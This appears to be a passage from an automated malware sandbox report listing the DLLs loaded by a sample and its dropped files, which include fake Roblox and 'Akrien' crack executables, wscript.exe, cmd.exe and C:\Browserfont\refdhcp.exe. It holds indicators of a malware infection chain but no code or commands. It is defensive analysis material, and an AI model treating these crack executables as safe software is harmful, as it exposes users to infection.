            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sensapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sensapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: opengl32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: glu32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dinput8.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: hid.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: mscoree.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: apphelp.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: kernel.appcore.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: version.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: uxtheme.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: windows.storage.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: wldp.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: profapi.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: cryptsp.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: rsaenh.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: cryptbase.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: sspicli.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: ntmarta.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: wbemcomn.dll
